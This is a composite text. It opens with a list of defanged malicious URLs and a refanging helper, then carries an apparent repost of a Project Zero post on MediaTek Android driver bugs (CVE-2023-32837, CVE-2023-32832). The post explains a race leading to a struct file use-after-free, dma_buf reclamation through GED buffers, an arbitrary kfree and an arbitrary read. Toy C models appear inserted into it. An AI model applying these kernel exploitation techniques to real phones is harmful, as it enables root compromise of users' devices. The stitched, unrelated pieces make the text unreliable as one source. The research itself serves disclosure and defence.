hxxps[://]www[.]craftwithme[.]uk/cwmb/d26873c6[.]php 
hxxps[://]download[.]teraspace[.]co[.]in/teraspace/ 
hxxps[://]download[.]teraspace[.]co[.]in/78181D14[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/craftwithme/ 
hxxps[://]download[.]webbucket[.]co[.]uk/webbucket/
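The network indicators above are defanged (`hxxps`, `[://]`, `[.]`) and contain some repeated entries. Before loading them into a blocklist or search, they can be normalized with something like the sketch below. The function names are hypothetical, and the refanged values point at malicious infrastructure, so they should only be used for detection and blocking.

```python
import re


def refang(indicator):
    """Convert a defanged indicator (hxxp, [://], [.]) back to its plain form."""
    text = indicator.strip()
    text = text.replace("[://]", "://").replace("[.]", ".")
    # Only rewrite the scheme at the start of the string.
    return re.sub(r"^hxxp", "http", text, flags=re.IGNORECASE)


def unique_indicators(lines):
    """Refang each non-empty line and drop repeats while preserving order."""
    seen = set()
    result = []
    for line in lines:
        if not line.strip():
            continue
        value = refang(line)
        if value not in seen:
            seen.add(value)
            result.append(value)
    return result
```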

Yesterday — 13 June 2024Main stream

Driving forward in Android drivers

13 June 2024 at 18:03

Posted by Seth Jenkins, Google Project Zero

Introduction

Android's open-source ecosystem has led to an incredible diversity of manufacturers and vendors developing software that runs on a broad variety of hardware. This hardware requires supporting drivers, meaning that many different codebases carry the potential to compromise a significant segment of Android phones. There are recent public examples of third-party drivers containing serious vulnerabilities that are exploited on Android. While there exists a well-established body of public (and In-the-Wild) security research on Android GPU drivers, other chipset components may not be as frequently audited so this research sought to explore those drivers in greater detail.

Driver Enumeration: Not as Easy as it Looks

This research focused on three Android devices (chipset manufacturers in parentheses):

- Google Pixel 7 (Tensor)

- Xiaomi 11T (MediaTek)

- Asus ROG 6D (MediaTek)

In order to perform driver research on these devices I first had to find all of the kernel drivers that were accessible from an unprivileged context on each device; a task complicated by the non-uniformity of kernel drivers (and their permissions structures) across different devices even within the same chipset manufacturer. There are several different methodologies for discovering these drivers. The most straightforward technique is to search the associated filesystems looking for exposed driver device files. These files serve as the primary method by which userland can interact with the driver. Normally the “file” is open’d by a userland process, which then uses a combination of read, write, ioctl, or even mmap to interact with the driver. The driver then “translates” those interactions into manipulations of the underlying hardware device sending the output of that device back to userland as warranted. Effectively all drivers expose their interfaces through the ProcFS or DevFS filesystems, so I focused on the /proc and /dev directories while searching for viable attack surfaces. Theoretically, evaluating all the userland accessible drivers should be as simple as calling find /dev or find /proc, attempting to open every file discovered, and logging which open attempts were successful.
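The naive "find, then try to open" approach described above can be sketched in a few lines. This is an illustration rather than the tooling used in this research: the function name is hypothetical, it assumes a Python interpreter is available in the context being tested, and opening some device files can have side effects, so it should only be run on a test device.

```python
import errno
import os


def probe_device_files(root):
    """Walk 'root' and try to open every non-directory entry read-only.

    Returns a dict mapping each path to "OK" or to the errno name of the failure.
    Directories that cannot be listed are silently skipped, which is exactly the
    blind spot discussed in the text that follows.
    """
    results = {}
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                # O_NONBLOCK avoids hanging on FIFOs or devices that block on open.
                fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK)
            except OSError as exc:
                results[path] = errno.errorcode.get(exc.errno, str(exc.errno))
            else:
                os.close(fd)
                results[path] = "OK"
    return results
```

Calling `probe_device_files("/dev")` and filtering for `"OK"` gives a first approximation of the reachable device files.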

However, there is one major roadblock that prevents this approach from being comprehensive - permissions! SELinux and traditional Linux Discretionary Access Control policies can prevent simple filesystem enumeration from discovering all of the accessible device drivers associated on the filesystem. For example, the untrusted_app SELinux context has search permissions on the device SELinux context for directories, but is not allowed to directly open the directory itself:

sepolicy shows search permission on the "device" SELinux context

This search permission (rather counterintuitively) does not allow the source context to list the contents of directories that have this SELinux target context. Instead, it simply allows such a directory to be in the ancestor directories of the file path that the source context attempts to open. In practice, this means that untrusted_app is allowed to open e.g. /dev/mali0 but is usually not allowed to open /dev itself:

untrusted_app is unable to list /dev but can open files within it like /dev/mali0

In the case of /dev, the shell context is allowed to open and list the contents of /dev. That means that by first enumerating the /dev directory from the shell context, then attempting to open all discovered files from the untrusted_app context, a security researcher can understand what drivers are and are not accessible from an app context in the /dev directory. However, there are cases where certain directories are simply not listable from a debugging-accessible non-root context, particularly in /proc. One option to enumerate all these directories would be to root the phone; however, this is not always easily achievable.

A strategy I found helpful in this regard was to examine publicly released kernel source code for the phone model or for similar phone models. The location of this source code varies significantly from manufacturer to manufacturer, but the source code is usually hosted either on GitHub or on the manufacturer's website. Device drivers create files in /proc primarily via the proc_create() and proc_mkdir() function calls. A real-world example of this would be:

        parent = proc_mkdir("perfmgr", NULL);
        perfmgr_root = parent;
        pe = proc_create("perf_ioctl", 0664, parent, &Fops);
        ...
        pe = proc_create("eara_ioctl", 0664, parent, &eara_Fops);
        ...
        pe = proc_create("eas_ioctl", 0664, parent, &eas_Fops);
        ...
        pe = proc_create("xgff_ioctl", 0664, parent, &xgff_Fops);
        ...

Although these files cannot be directly enumerated, they do exist and are accessible from an untrusted context.

/proc/perfmgr directory contents cannot be listed with ls, but can be open'd

It would have otherwise required rooting the phone to discover this driver without analyzing the kernel source code.
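As a small illustration of turning those source-code findings into something testable, the sketch below builds candidate paths from the names passed to proc_mkdir() and proc_create() in the snippet above. A NULL parent in proc_mkdir() places the directory directly under /proc, which is why the prefix is /proc/perfmgr. The helper build_proc_path and the array names are hypothetical.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Entry names copied from the proc_create() calls quoted above. */
const char *const perfmgr_entries[] = {
        "perf_ioctl", "eara_ioctl", "eas_ioctl", "xgff_ioctl",
};
const size_t perfmgr_entry_count =
        sizeof(perfmgr_entries) / sizeof(perfmgr_entries[0]);

/* Join a /proc directory name and an entry name into a full path.
 * Returns 0 on success, -1 if the result would not fit in `out`. */
int build_proc_path(char *out, size_t out_len,
                    const char *dir, const char *entry)
{
        int n = snprintf(out, out_len, "/proc/%s/%s", dir, entry);

        return (n < 0 || (size_t)n >= out_len) ? -1 : 0;
}
```

Each resulting path can then be opened from the untrusted context to check whether the entry exists and is reachable, even though the parent directory cannot be listed.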

Another useful resource is the SELinux policy itself. Userland interacts with the drivers via a fairly typical set of VFS operations, so the SELinux policy must encode the permissions needed to perform those operations. As a result, the policy generally reflects what the developers intend to be accessible from an untrusted context. Analysis of the policy can lead to the discovery of certain oddities and idiosyncrasies in the accessibility of certain drivers. For example, occasionally a file may not be directly openable via the filesystem, but there may be some alternative method by which an app can ask another more privileged process to open the file on its behalf and hand the associated fd back, after which the app is allowed to read/write/ioctl to the fd itself. One example of this behavior would be the EdgeTPU device on the Pixel 7:

Additional research suggests that untrusted_app can ask a privileged process for access to the EdgeTPU driver fd itself if it lands on an allowlist of certain applications.

The performed surveys strongly imply that the GPU driver is the most consistently accessible driver from an untrusted application, which is expected. On the Google Pixel 7, I did not find much else that was accessible from an entirely unprivileged context. Nevertheless, inspired by previous similar efforts on hardware like Samsung’s NPU, I performed research on the EdgeTPU driver - Google’s tensor processing unit for doing ML-related tasks on the Pixel series of devices. This resulted in the discovery of one significant issue - a race condition when registering memory with the EdgeTPU driver while VMAs are concurrently being modified.

Unlike the Pixel 7, the MediaTek chipset phones (Asus ROG 6D and Xiaomi 11T) contained several different drivers that could be accessed from unprivileged userland:

  • /proc/ged
  • /proc/mtk_jpeg
  • /proc/perfmgr/[eara_ioctl,eas_ioctl,perf_ioctl,xgff_ioctl]

These drivers represent significantly more interesting and complex attack surfaces than what was available on the Pixel 7 device. The ged driver contained numerous interesting and valuable exploitation primitives that we’ll discuss in detail a bit later. While the perfmgr driver presented several attack surfaces, I wasn’t able to find any security-relevant bugs. The mtk_jpeg driver, however, yielded significant fruit that deserves a closer look.

MediaTek JPEG Decoding Accelerator

The mtk_jpeg driver manages specialized hardware on MediaTek devices to perform JPEG decoding acceleration. Linux kernel documentation notes that “Mediatek JPEG Decoder is the JPEG decode hardware present in Mediatek SoCs”. More relevantly, from an attacker's point of view, this driver can be accessed (at least on the phones assessed) from the untrusted_app context (although curiously, it cannot be accessed from an unprivileged adb debugging context). This JPEG decoding accelerator and its associated driver are present on both the Xiaomi 11T and the Asus ROG 6D. However, based on open-source codebases for these different devices' kernels, it appears MediaTek is actively maintaining several different trees for this driver, likely based on the associated kernel version, and these two devices use separate trees.

I found two vulnerabilities in this driver. CVE-2023-32837 was a textbook OOB read/write in an array of structs. Various members of the struct were accessed and modified, creating several different possibilities for exploitation, but also making exploitation significantly more challenging. Interestingly, MediaTek partially fixed this bug in July 2021, although the exact date this patch went out to OEMs is unclear. From the commit message, it’s clear that MediaTek detected this issue with the Coverity static analysis tool, but it appears unlikely that the security impact was identified. Regardless, while the issue was fixed in some of the MediaTek kernel trees, it went unpatched in other versions of that same driver. This meant that while the Asus ROG 6D (running kernel 5.10) had received the patch for this vulnerability, the (otherwise fully patched and security supported) Xiaomi 11T (running 4.14) had not.

Some background knowledge on how the JPEG driver works eases discussion of the other issue, CVE-2023-32832. The accelerator hardware has two separate “cores” that can perform JPEG decoding. When a process requests JPEG decoding work to be performed, it calls the ioctl JPEG_DEC_IOCTL_HYBRID_START, and the kernel decides which decoding core will perform that work inside of jpeg_drv_hybrid_dec_lock() (output has been colorized to ease following along):

static int jpeg_drv_hybrid_dec_lock(int *hwid)

{

        int retValue = 0;

        int id = 0;

        ...

        mutex_lock(&jpeg_hybrid_dec_lock);

        for (id = 0; id < HW_CORE_NUMBER; id++) {

                if (dec_hwlocked[id]) {

                        JPEG_LOG(1, "jpeg dec HW core %d is busy", id);

                        continue;

                } else {

                        *hwid = id;

                        dec_hwlocked[id] = true;

                        JPEG_LOG(1, "jpeg dec get %d HW core", id);

                        _jpeg_hybrid_dec_int_status[id] = 0;

                        jpeg_drv_hybrid_dec_power_on(id);

                        enable_irq(gJpegqDev.hybriddecIrqId[id]);

                        break;

                }

        }

        mutex_unlock(&jpeg_hybrid_dec_lock);

        if (id == HW_CORE_NUMBER) {

                JPEG_LOG(1, "jpeg dec HW core all busy");

                *hwid = -1;

                retValue = -EBUSY;

        }

        return retValue;

}

The array dec_hwlocked contains a boolean element for each core, with that element being set to true for locked cores, and false for unlocked cores. This array is also protected with a mutex to try to prevent concurrent calls to jpeg_drv_hybrid_dec_lock or jpeg_drv_hybrid_dec_unlock from racing with each other. After locking the core, jpeg_drv_hybrid_dec_start sets up the data structures to be utilized for the decoding operation:

switch (cmd) {

        case JPEG_DEC_IOCTL_HYBRID_START:

                if (copy_from_user(

                        &taskParams, (void *)arg,

                        sizeof(struct JPEG_DEC_DRV_HYBRID_TASK))) {

                        return -EFAULT;

                }

                ...

                if (jpeg_drv_hybrid_dec_lock(&hwid) == 0) {

                        *pStatus = JPEG_DEC_PROCESS;

                } else {

                        JPEG_LOG(1, "jpeg_drv_hybrid_dec_lock failed (hw busy)");

                        return -EBUSY;

                }

                if (jpeg_drv_hybrid_dec_start(taskParams.data, hwid, &index_buf_fd) == 0) {

                        ...

                } else {

                        JPEG_LOG(0, "jpeg_drv_dec_hybrid_start failed");

                        jpeg_drv_hybrid_dec_unlock(hwid);

                        return -EFAULT;

                }

                break;

...

}

static int jpeg_drv_hybrid_dec_start(unsigned int data[],unsigned int id,int *index_buf_fd)

{

        u64 ibuf_iova, obuf_iova;

        int ret;

        void *ptr;

        unsigned int node_id;

        JPEG_LOG(1, "+ id:%d", id);

        ret = 0;

        ibuf_iova = 0;

        obuf_iova = 0;

        node_id = id / 2;

        bufInfo[id].o_dbuf = jpg_dmabuf_alloc(data[20], 128, 0);

        bufInfo[id].o_attach = NULL;

        bufInfo[id].o_sgt = NULL;

        bufInfo[id].i_dbuf = jpg_dmabuf_get(data[7]);

        bufInfo[id].i_attach = NULL;

        bufInfo[id].i_sgt = NULL;

        if (!bufInfo[id].o_dbuf) {

                JPEG_LOG(0, "o_dbuf alloc failed");

                return -1;

        }

        if (!bufInfo[id].i_dbuf) {

                JPEG_LOG(0, "i_dbuf null error");

                return -1;

        }

        ret = jpg_dmabuf_get_iova(bufInfo[id].o_dbuf, &obuf_iova, gJpegqDev.pDev[node_id], &bufInfo[id].o_attach, &bufInfo[id].o_sgt);

        JPEG_LOG(1, "obuf_iova:0x%llx lsb:0x%lx msb:0x%lx", obuf_iova,

                (unsigned long)(unsigned char*)obuf_iova,

                (unsigned long)(unsigned char*)(obuf_iova>>32));

        ptr = jpg_dmabuf_vmap(bufInfo[id].o_dbuf);

        if (ptr != NULL && data[20] > 0)

                memset(ptr, 0, data[20]);

        jpg_dmabuf_vunmap(bufInfo[id].o_dbuf, ptr);

        jpg_get_dmabuf(bufInfo[id].o_dbuf);

        // get obuf for adding reference count, avoid early release in userspace.

        *index_buf_fd = jpg_dmabuf_fd(bufInfo[id].o_dbuf);

        ret = jpg_dmabuf_get_iova(bufInfo[id].i_dbuf, &ibuf_iova, gJpegqDev.pDev[node_id], &bufInfo[id].i_attach, &bufInfo[id].i_sgt);

        JPEG_LOG(1, "ibuf_iova 0x%llx lsb:0x%lx msb:0x%lx", ibuf_iova,

                (unsigned long)(unsigned char*)ibuf_iova,

                (unsigned long)(unsigned char*)(ibuf_iova>>32));

        if (ret != 0) {

                JPEG_LOG(0, "get iova fail i:0x%llx o:0x%llx", ibuf_iova, obuf_iova);

                return ret;

        }

        ...

        return ret;

}

Finally, utilizing an ioctl call to JPEG_DEC_IOCTL_HYBRID_WAIT (which calls jpeg_drv_hybrid_dec_unlock), resources associated with the core are freed, and the core is released back to be used in future operations.

case JPEG_DEC_IOCTL_HYBRID_WAIT:

                ...

                if (copy_from_user(

                        &pnsParmas, (void *)arg,

                        sizeof(struct JPEG_DEC_DRV_HYBRID_P_N_S))) {

                        JPEG_LOG(0, "Copy from user error");

                        return -EFAULT;

                }

                /* set timeout */

                timeout_jiff = msecs_to_jiffies(3000);

                JPEG_LOG(1, "JPEG Hybrid Decoder Wait Resume Time: %ld",

                                timeout_jiff);

                hwid = pnsParmas.hwid;

                if (hwid < 0 || hwid >= HW_CORE_NUMBER) { //In other versions of the driver, this >= check was omitted, which led to several different OOB accesses later aka CVE-2023-32837

                        JPEG_LOG(0, "get hybrid dec id failed");

                        return -EFAULT;

                }

                if (!dec_hwlocked[hwid]) {

                        JPEG_LOG(0, "wait on unlock core %d\n", hwid);

                        return -EFAULT;

                }

                if (jpeg_isr_hybrid_dec_lisr(hwid) < 0) {

                        long ret = 0;

                        int waitfailcnt = 0;

                        do {

                                ret = wait_event_interruptible_timeout(

                                        hybrid_dec_wait_queue[hwid],

                                        _jpeg_hybrid_dec_int_status[hwid],

                                        timeout_jiff);

                                ...

                                if (ret < 0) {

                                        waitfailcnt++;

                                        usleep_range(10000, 20000);

                                }

                        } while (ret < 0 && waitfailcnt < 500);

                }

                ...

                if (copy_to_user(pnsParmas.progress_n_status, &progress_n_status, sizeof(int))) {

                        return -EFAULT;

                }

                ...

                jpeg_drv_hybrid_dec_unlock(hwid);

                break;

                ...

}

...

static void jpeg_drv_hybrid_dec_unlock(unsigned int hwid)

{

        mutex_lock(&jpeg_hybrid_dec_lock);

        if (!dec_hwlocked[hwid]) {

                JPEG_LOG(0, "try to unlock a free core %d", hwid);

        } else {

                dec_hwlocked[hwid] = false;

                JPEG_LOG(1, "jpeg dec HW core %d is unlocked", hwid);

                jpeg_drv_hybrid_dec_power_off(hwid);

                disable_irq(gJpegqDev.hybriddecIrqId[hwid]);

                jpg_dmabuf_free_iova(bufInfo[hwid].i_dbuf,

                        bufInfo[hwid].i_attach,

                        bufInfo[hwid].i_sgt);

                jpg_dmabuf_free_iova(bufInfo[hwid].o_dbuf,

                        bufInfo[hwid].o_attach,

                        bufInfo[hwid].o_sgt);

                jpg_dmabuf_put(bufInfo[hwid].i_dbuf);

                jpg_dmabuf_put(bufInfo[hwid].o_dbuf);

                // we manually add 1 ref count, need to put it.

        }

        mutex_unlock(&jpeg_hybrid_dec_lock);

}

jpeg_drv_hybrid_dec_unlock is also called in the event that jpeg_drv_hybrid_dec_start fails.

While the jpeg_hybrid_dec_lock mutex protects the direct core locking and unlocking, it does not protect the body of the jpeg_drv_hybrid_dec_start function. This means that while calls to jpeg_drv_hybrid_dec_lock and jpeg_drv_hybrid_dec_unlock cannot run concurrently with each other, calls to jpeg_drv_hybrid_dec_start and jpeg_drv_hybrid_dec_unlock can. In practice this is just as bad, as these two functions racily access the same global data structure, bufInfo.

One small added complication for this bug is that the JPEG_DEC_IOCTL_HYBRID_WAIT handler checks that the core is locked before it begins waiting on it. To reach the jpeg_drv_hybrid_dec_unlock call at the end of that handler, the core must therefore already be locked when the wait begins.

An example of this race in practice with two processes A and B would be (colorized respective to the above code):

Process A:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_START, which locks core 0 with jpeg_drv_hybrid_dec_lock and enters jpeg_drv_hybrid_dec_start

Process B:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_WAIT, which confirms that core 0 is locked then begins a 3 second wait for the core to send an interrupt denoting completion of the decoding request.

Process A:

Fails jpeg_drv_hybrid_dec_start, (after initializing some of the data structures), calls jpeg_drv_hybrid_dec_unlock on core 0 freeing any allocated resources, and returns to userland.

[wait ~3 seconds]

Process A:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_START, which locks core 0 with jpeg_drv_hybrid_dec_lock and enters jpeg_drv_hybrid_dec_start

Process B:

3 second wait times out, and the JPEG_DEC_IOCTL_HYBRID_WAIT ioctl call unlocks core 0 with jpeg_drv_hybrid_dec_unlock.

[Process A and B are now concurrently initializing and freeing the same data-structures]

This can lead to a variety of use-after-free or double free conditions, depending on how process A and B race.

The Journey to root

The next step was to try to exploit these issues. My first attempt targeted the OOB write issue, CVE-2023-32837. I was able to develop the primitive from an uncontrolled OOB read/write in the kernel .data region into a racy write of null bytes at a predetermined offset in a kernel task stack used by an attacker-controlled process. At this point it was possible to overwrite a kernel stack entry with nulls during any syscall which felt to me like enough flexibility to create a full exploit. However, despite my best efforts (including the creation of a tool to find where in an arbitrary backtrace the write would occur), I was unable to discover a technique to create a better primitive from this write.

Failing that effort, I decided to take a look at the other issue in the same driver, CVE-2023-32832. During the freeing step that races with jpeg_drv_hybrid_dec_start, jpeg_drv_hybrid_dec_unlock drops access to four separate resources:

jpg_dmabuf_free_iova(bufInfo[hwid].i_dbuf, bufInfo[hwid].i_attach, bufInfo[hwid].i_sgt); //The input buffer virtual address mapping in the core

jpg_dmabuf_free_iova(bufInfo[hwid].o_dbuf, bufInfo[hwid].o_attach, bufInfo[hwid].o_sgt); //The output buffer virtual address mapping in the core

jpg_dmabuf_put(bufInfo[hwid].i_dbuf); //The input buffer file's refcount is decremented. This buffer was previously allocated by the attacker and is associated with a file descriptor.

jpg_dmabuf_put(bufInfo[hwid].o_dbuf); //The output buffer file's refcount is decremented. This buffer was previously allocated during jpeg_drv_hybrid_dec_start.

One critical behavior of the driver that enhanced exploitability was that although jpeg_drv_hybrid_dec_unlock properly drops the refcounts of i_dbuf and o_dbuf, it does not reinitialize those entries in the bufInfo global array to NULL. As it relates to the race, this means that if Process B’s racy jpeg_drv_hybrid_dec_unlock occurs before Process A’s second jpeg_drv_hybrid_dec_start reinitializes i_dbuf and o_dbuf, an extra refcount of i_dbuf and o_dbuf will be released. Since i_dbuf and o_dbuf are struct file*’s, this can lead directly to a struct file UAF. As the i_dbuf struct file comes directly from a dmabuf file descriptor passed into jpeg_drv_hybrid_dec_start, this leads to a dangling file descriptor with the struct file freed from underneath it. This is undoubtedly an exploitable bug.
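The effect of that stale pointer can be modeled in userspace. The sketch below is a deliberately simplified, single-threaded replay of the interleaving for one core: it tracks only the input buffer's refcount, and every toy_ name is hypothetical rather than taken from the driver. It assumes Process B's unlock lands before Process A's second start has taken its reference.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy stand-in for a struct file: a refcount and a "freed" marker. */
struct toy_file {
        int refcount;
        bool freed;
};

struct toy_file *buf_info_i_dbuf;   /* models bufInfo[0].i_dbuf */
bool core_locked;                   /* models dec_hwlocked[0] */

void toy_put(struct toy_file *f)
{
        if (--f->refcount == 0)
                f->freed = true;
}

/* Models jpeg_drv_hybrid_dec_lock() for a single core. */
bool toy_lock(void)
{
        if (core_locked)
                return false;
        core_locked = true;
        return true;
}

/* Models the part of jpeg_drv_hybrid_dec_start() that takes a reference. */
void toy_start(struct toy_file *input)
{
        input->refcount++;
        buf_info_i_dbuf = input;
}

/* Models jpeg_drv_hybrid_dec_unlock(): drops the reference but leaves
 * the pointer in place instead of resetting it to NULL. */
void toy_unlock(void)
{
        if (!core_locked)
                return;
        core_locked = false;
        toy_put(buf_info_i_dbuf);
}

/* Replays the race; `file` starts with the one reference held by the fd. */
void replay_race(struct toy_file *file)
{
        toy_lock();        /* A: first START locks the core */
        toy_start(file);   /* A: takes a reference (refcount 2) */
        toy_unlock();      /* A: start fails, reference dropped (refcount 1) */

        toy_lock();        /* A: second START locks the core again */
        toy_unlock();      /* B: timed-out WAIT unlocks before A's start runs */
        /* The stale pointer was put a second time: refcount 0, fd still open. */
}
```

In the model, the file ends up marked freed while the descriptor that owned the only legitimate reference is still open, which is the dangling-fd condition described above.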

There are several different techniques for exploiting a dangling file descriptor. One widely used strategy is causing the backing slab page of the struct file to be freed and returned back to the page allocator, then reallocating that page with pipe buffer data pages in order to gain attacker control over the memory used for the struct file. Another well-known strategy would be to utilize the cross-cache technique to reallocate the memory as a different kind of kmalloc slab/object. However, in the future both of these techniques may be remediated if the SLAB_VIRTUAL mitigation comes into effect in the mainline Linux kernel. In the interest of exploring the future of Android kernel hacking, I sought a novel exploitation technique which did not involve cross-cache or slab-cache->page allocator heap shaping techniques.

Some Other Novel Exploitation Technique

One of the most common UAF exploit techniques involves reallocating the first-order freed object with a new object of a different type, creating a type-confusion condition which leads to an improved memory corruption primitive. However, the only type of object that can be allocated in a page designated for the struct file cache is the struct file type, so the options for creating a type confusion memory corruption condition using first-order object reclamation are limited. That said, just because an object is freed does not preclude it from being usable under limited circumstances. When the kernel inserts an object onto a freelist, this clobbers the middle of the object. The rest of the object, however, remains in whatever state it was in at the moment it was freed, including pointers and any other member variables. Those stale pointers can (and in practice often do) point to other freed objects which may be allocated from a different slab cache entirely, potentially including the generic kmalloc slab-caches. Note that under the C-ism where pointers are set to NULL after freeing, these stale pointers wouldn’t exist. However, as the memory containing the pointer is getting freed anyway, setting these pointers to NULL is often seen as unnecessarily conservative (and in fact, C compilers often throw away writes to objects that are about to be freed).

By continuing to use this freed first-order object, we can implicitly access freed second-order child objects. By reclaiming those objects, we can recreate a type-confusion memory corruption primitive, taking advantage of how the methods called on the first-order freed object implicitly access the second-order child object. Let’s see how we can apply this to our specific scenario.

Linux kernel struct files may represent many different types of files depending on the kind of opened file such as ext4 files, procfs files, or even MediaTek JPEG decoding driver files. In order to represent all of these different types while also maintaining some commonality of structure for the universally needed members of an opened file, struct file contains a private_data member which references any type-specific data needed.

As mentioned previously, the UAF’d struct file in this case is a dmabuf file. This means the private_data pointer points to a struct dma_buf object. The dma_buf object lifetime is implicitly tied to the lifetime of the associated dmabuf file struct. When the dmabuf struct file is freed, the dma_buf object is freed too. However, unlike the struct file, dma_buf objects are allocated from the generic kmalloc slab caches. This means that the dma_buf can be reclaimed with an object of a different type that comes from the same generic kmalloc slab cache.

After a hypothetical reclamation by a new object, this new object can still be UAF referenced as a dma_buf through the freed but still very usable dmabuf struct file that itself is referenced via the dangling file descriptor! Thus we arrive at the following strategy:

  1. Free the file by using our race condition bug to drop an extra reference on i_dbuf (which also frees the dma_buf), leaving a dangling fd pointing to a freed struct file which still has a stale pointer to a freed dma_buf
  2. Reclaim the dma_buf WITHOUT reclaiming the struct file
  3. Call dma_buf operations on the dangling fd
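The three steps above can be modeled with a pair of toy "slab slots" in ordinary C. This is a sketch under loud assumptions: the structures are drastically reduced, freeing is modeled by clearing a flag so that no real freed memory is touched, and the freelist pointer that the kernel writes into a freed object is ignored. All toy_ names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Child object; in the kernel it comes from a generic kmalloc cache. */
struct toy_dma_buf {
        uint64_t size;
};

/* One slot of the generic cache: usable as a dma_buf or as raw bytes. */
union toy_generic_slot {
        struct toy_dma_buf dma_buf;
        unsigned char raw[sizeof(struct toy_dma_buf)];
};

/* Parent object; in the kernel it comes from the dedicated file cache. */
struct toy_file {
        struct toy_dma_buf *private_data;
        bool allocated;
};

union toy_generic_slot generic_slot;
struct toy_file file_slot;

/* An operation reached through the dangling fd: it trusts private_data. */
uint64_t toy_fd_read_size(void)
{
        return file_slot.private_data->size;
}

uint64_t demo_second_order_uaf(uint64_t attacker_value)
{
        /* Normal setup: the file owns a dma_buf. */
        generic_slot.dma_buf.size = 4096;
        file_slot.private_data = &generic_slot.dma_buf;
        file_slot.allocated = true;

        /* Step 1: the bug frees the file (and with it the dma_buf).
         * Nothing wipes the file's stale private_data pointer. */
        file_slot.allocated = false;

        /* Step 2: reclaim only the generic slot with attacker bytes. */
        assert(sizeof(attacker_value) <= sizeof(generic_slot.raw));
        memcpy(generic_slot.raw, &attacker_value, sizeof(attacker_value));

        /* Step 3: use the dangling fd; the stale pointer now leads to
         * attacker-controlled data interpreted as a dma_buf. */
        return toy_fd_read_size();
}
```

The value returned is whatever the attacker sprayed, even though the parent was never reclaimed and never changed type.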

You may have astutely noted by this point that this strategy relies on a freed object (that is, the struct file) not being reclaimed as another object by the heap allocator. This is absolutely correct, and one would expect that in an exploit where exceptional reliability is a priority, it may be necessary to perform some heap shaping in order to bury this freed struct file deeply in the allocator freelists. In practice (and in my exploit), the freed struct file will rarely be on the percpu active slab so it’s unlikely to get reclaimed immediately, and my exploit generally runs fast enough that it doesn’t matter.

At this point we now need to determine what object to use in order to reclaim the freed dma_buf, as well as what operation to call on the freed dma_buf file/object to develop a stronger primitive. I ended up finding the solutions to both of these problems in the GED driver.

The GED driver

The GED (GPU Extension Device) driver is a MediaTek-specific interface that provides userland with several supplementary GPU features, primarily for tuning purposes. Two of its “features” appeared particularly valuable. Feature number one, GED GE Buffers, presented a truly remarkable heap spray and reclamation primitive. This feature provides several requisite characteristics of a suitable heap spray primitive:

  • Allocates buffers of a controlled size without causing undue noise for the rest of the heap.
  • Buffer data is fully attacker controlled, with no uncontrolled header at the beginning
  • Buffers can be freed at any time.

One standout characteristic that elevates this heap spray primitive above many of its peers, however, is that even once allocated, the attacker can read and write to these buffers at will while keeping the buffer allocated. This is about as powerful a heap spray primitive as one could imagine. By reclaiming the UAF’d dma_buf struct with a GED GE buffer, we gain fully deterministic read/write over the dma_buf struct, including any pointers contained therein.

Graph showing the overlapping object hierarchy of a UAF'd dma buffer struct file and a GE file

Feature number two is an alternate codepath to the same functionality as the DMA_BUF_SET_NAME ioctl, which is (very sensibly) used to set the name of a dma_buf. The biggest difference between these paths is the GED codepath’s lack of SELinux inode checks on the underlying dma_buf fd. These inode checks would normally crash the kernel when they run on a freed struct file - however because of the GED codepath, we can skip this inode check, and change the dma_buf’s name despite running on a freed dma_buf file! Normally, this code would free the pointer to the previous name within the dma_buf struct and allocate a new buffer for the name string. However, because of GED GE buffers we are able to control the entirety of the dma_buf struct. By combining these primitives, we can kfree an arbitrary pointer before setting a new name string.

long mtk_dma_buf_set_name(struct dma_buf *dmabuf, const char *buf)

{

        char *name = kstrndup(buf, DMA_BUF_NAME_LEN, GFP_KERNEL);

        ...

        kfree(dmabuf->name); //dmabuf is attacker controlled

        dmabuf->name = name; //the name pointer is written to attacker controlled memory

        ...

}
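To make the resulting primitive concrete, here is a userspace model of that function operating on a fake dma_buf. It is only a sketch: toy_kfree records its argument instead of freeing anything, the name length limit is an arbitrary stand-in, and all toy_ identifiers are hypothetical.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

#define TOY_NAME_LEN 32   /* stand-in for DMA_BUF_NAME_LEN */

struct toy_dma_buf {
        char *name;
};

void *last_freed;   /* what toy_kfree() was last asked to free */

/* Records the pointer only; a real kfree() would release it. */
void toy_kfree(void *p)
{
        last_freed = p;
}

/* Same shape as the set-name path: duplicate the new name, free the old
 * pointer found in the struct, store the new pointer in the struct. */
int toy_set_name(struct toy_dma_buf *dmabuf, const char *buf)
{
        size_t len = 0;
        char *name;

        while (len < TOY_NAME_LEN && buf[len] != '\0')
                len++;
        name = malloc(len + 1);
        if (!name)
                return -1;
        memcpy(name, buf, len);
        name[len] = '\0';

        toy_kfree(dmabuf->name);   /* old pointer is attacker chosen */
        dmabuf->name = name;       /* new pointer lands in attacker-readable memory */
        return 0;
}
```

Two things fall out of one call: whatever address the attacker placed in the name field is passed to the free routine, and a fresh heap pointer is written back into memory the attacker can read.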

Achieving arbitrary read

Innocuous dmabuf file operations become potent primitives now that we have precise control of the dma_buf struct. For example, this is the code backing /proc/pid/fdinfo/n for dmabuf files:

static void dma_buf_show_fdinfo(struct seq_file *m, struct file *file)

{

        struct dma_buf *dmabuf = file->private_data;

        seq_printf(m, "size:\t%zu\n", dmabuf->size);

        /* Don't count the temporary reference taken inside procfs seq_show */

        seq_printf(m, "count:\t%ld\n", file_count(dmabuf->file) - 1);

        seq_printf(m, "exp_name:\t%s\n", dmabuf->exp_name);

        spin_lock(&dmabuf->name_lock);

        if (dmabuf->name)

                seq_printf(m, "name:\t%s\n", dmabuf->name);

        spin_unlock(&dmabuf->name_lock);

}

There are several opportunities in this function for achieving arbitrary read, but the cleanest one is the file_count() call, which will dereference the passed pointer + a hardcoded offset, and print the read 8 byte value as a signed long. Normally in the context of this C function, file == ((struct dma_buf*) file->private_data)->file , but since we control the dma_buf struct that isn’t necessarily the case.
